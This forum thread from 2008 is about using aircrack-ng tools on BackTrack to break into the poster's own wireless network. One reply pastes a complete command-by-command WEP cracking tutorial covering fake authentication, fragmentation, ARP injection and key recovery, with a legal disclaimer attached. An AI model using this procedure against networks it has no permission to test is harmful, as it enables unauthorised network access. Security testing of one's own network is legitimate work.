Jump to content


Check out our Community Blogs

Register and join over 40,000 other developers!


Recent Status Updates

View All Updates

Photo
- - - - -

Using Aireplay to crack into my WEP Network

authentication

  • Please log in to reply
22 replies to this topic

#1 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 05 October 2008 - 09:55 AM

So I am using Remote Exploits software to see if I can get into my own wireless network without the password, and here is the trouble.

Posted Image

That step is the last step, anyone know how to switch the Wlan0 channel?

EDIT! Not WEP network, WPA Network


UPDATE! I changed the channel to 1 on both, however, now it does this
Sending Authentication Request (Open System)
Authentication successful
Sending Association Request
Denied (code12), wrong ESSID or WPA?


ERRR! I just wanna figure this out

Edited by TkTech, 05 October 2008 - 04:10 PM.
*sigh*

  • 0

#2 Steve.L

Steve.L

    CC Addict

  • Member
  • PipPipPipPipPip
  • 382 posts
  • Location:Kingston, Canada
  • Programming Language:C, Java, C++, PHP, Python, Ruby, PL/SQL, Delphi/Object Pascal, Lisp, Pascal, Transact-SQL, Assembly, Scheme, Haskell, Others

Posted 06 October 2008 - 10:06 AM

tutorial [Aircrack-ng]
  • 0

#3 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 06 October 2008 - 11:12 AM

What is your wireless interface? ath0?

See, as far as I know, every tutorial shows the teacher haivng ath0 and wifi0.. when I type airmon-ng start wifi0 9, it shows ONLY a wlan0 Which is weird, its like wireless is disabled, but its not
  • 0

#4 Datab0x

Datab0x

    CC Newcomer

  • Just Joined
  • PipPip
  • 13 posts

Posted 07 October 2008 - 08:04 PM

ath0 or wifi0 is pertaining to the wirless cards intereface/chipset. Did you type "airmon-ng" to check what your intereface, chipset and driver are? Also, the steps for methods for cracking wpa vs wep are severly different.

edit: Heh, I didn't see Steve's post, but the link he gave you what I used to figure pretty much everything out.
  • 0

#5 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 07 October 2008 - 09:38 PM

yeah, I figured out how to do it, just not on my laptop yet..
  • 0

#6 TcM

TcM

    CC Mentor

  • VIP Member
  • PipPipPipPipPipPipPipPip
  • 7563 posts

Posted 08 October 2008 - 09:46 AM

Why do you want to use wifi0? On mine it worked with wlan0 and I tried it over wifi..
  • 0

#7 kresh7

kresh7

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 326 posts

Posted 08 October 2008 - 10:07 AM

i think the problem is that you want to hack into a wirless networks with no clients and for that your using backtrack3 right ok here is a post of a friend of mine :D


Monitor Mode

The first thing to do is boot up backtrack, basically by booting to a CD like you normally would, if you can't figure this out, ask down below, or go use google. login to backtrack under root (password 'toor'), and then type "startx" into the command line to start out GUI.

Sweet, now we are running *nix, and we can start the good stuff. Open up a command line, but clicking on the icon that looks like one on the bottom next to the 'start' type thingy (let me know if I get to technical Smile )

Now, we need to enter this into the command line;

$ airmon-ng start wifi0 6

**starts wifi0 on channel 6, change for the channel of the network you are attacking, use kismet for this, not covered in this tutorial**

$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor 6

Sweet, now we have our card in monitor mode, and we can move onto bigger and better things.

Start up Airodump and getting some info ready

ok, lets start airodump so we can get some info out of it, and then we can just leave it running.

$ airodump-ng --ivs --write bob --channel 6 ath1

**basically heres what each thing means;
--ivs= only write the weak IV's, not every packet
--write= the prefix of the file we are writing to, so bob.ivs
--channel= the channel to scan on
ath1= our network device**

Now that airodump is running, we need to snag a couple pieces of information from it, 1) The MAC address of the AP we are attacking, it'll be in the first column. 2) the essid of the network, i.e. "linksys", or something similar.

Now, open up a new terminal (DON"T CLOSE AIRODUMP). type this line in;


$ export AP=mac_of_ap


Now we also have to get our mac address; this is easy in backtrack just type in the following;

Code:

$ macchanger --show ath1

**your output here**
export MAC=your_mac_address


This basically just stored those as variables, so you don't have to type them a bunch of times in the coming steps.

Getting everything ready

Basically what we are going to do to the network, is fake authorize ourselves using aireplay. Then using the same program, we are going to grab some peices of packets out of the replies given by fakeauth, and use those to create an arp reply packet with packetforge, to inject into the network to create IV's, so we can crack the key! Whew, lets get started!

First we need to set up, but NOT run our fake auth attack;

Code:

$ aireplay-ng -1 0 -e linksys -a $AP -h $MAC ath1

so, we are running aireplay attack 1, with no delay, linksys is the essid of the network we are attacking, -a is the MAC of the AP we are attacking, and -h is our MAC address. Don't run this yet, we will soon enough.

Open up another command line, so we can get ready to sniff out the packets we need. Enter the following;

Code:
$ aireplay-ng -5 -b $AP -h $MAC

Cool, step 1 of 2 is done for getting ready to create IV's, next we have to sniff a packet, and then create one of our own. So run the aireplay -5 command first, it will start to sniff the network, then run the first command. Eventually the -5 will find a packet that it can use, and it will ask you if you want to use it, say yes (type y and press enter). Now you can cancel the first command (stop it from fake auth'ing over and over) by pressing ctrl-c. Leave the window open.

Now, after we told aireplay-ng -5 yes, it should have created a .xor file. In the output, the name of it should be there. The line looks like this;

Code:

Saving Keystream in fragment-0215-124336.xor

**yours will be different**

Now, using this .xor file we can create an arp-reply package which we can inject to create weak IV's. So in the same window we ran the aireplay-ng -5 command, type in the following;

Code:

$ packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y your_.xor_file.xor -w arp-request

That will generate what we need, now we can run the final injection command that will inject the arp-request packets. Enter the following;

Code:

aireplay-ng -2 -r arp-request ath1

*you will have to say yes again btw*


Now you get to watch your #data column in airodump (you didn't close it did you?) skyrocket! Wait a few minutes, and when you have 100k packets (the #data column, 1 mil for 128 bit) run the following command to crack the key!

Code:

$ aircrack-ng -n 64 -b $AP *.ivs

**note, if its 128 bit, change 64 to 128**


There ya go! You have cracked WEP when there are no clients on the network!

**This is an education peice, you should not be cracking anybody elses network, it can get you fined/landed in jail, I take no responsibility for anything you do with this information**

**Obligatory Disclaimer; This tutorial was written 'by watchdog' as an education piece, cracking into somebody else's network is illegal and punishable by fine/jail. Don't be stupid**
  • 1
Posted Image

#8 TcM

TcM

    CC Mentor

  • VIP Member
  • PipPipPipPipPipPipPipPip
  • 7563 posts

Posted 08 October 2008 - 10:20 AM

Kresh, you are always a genius in these things!
  • 0

#9 kresh7

kresh7

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 326 posts

Posted 08 October 2008 - 10:56 AM

thx TcM just try to help :D
  • 0
Posted Image

#10 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 08 October 2008 - 06:50 PM

I already got it working lol.

I might make a tutorial on it, not sure
  • 0

#11 Datab0x

Datab0x

    CC Newcomer

  • Just Joined
  • PipPip
  • 13 posts

Posted 08 October 2008 - 07:33 PM

Yeah, I'd like to see how you accomplished it. I only know how to do it using dictionary attacks or deauthentification.
  • 0

#12 TcM

TcM

    CC Mentor

  • VIP Member
  • PipPipPipPipPipPipPipPip
  • 7563 posts

Posted 09 October 2008 - 07:01 AM

Why would you use such a method? When it can be easily cracked?!
  • 0





Also tagged with one or more of these keywords: authentication

Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download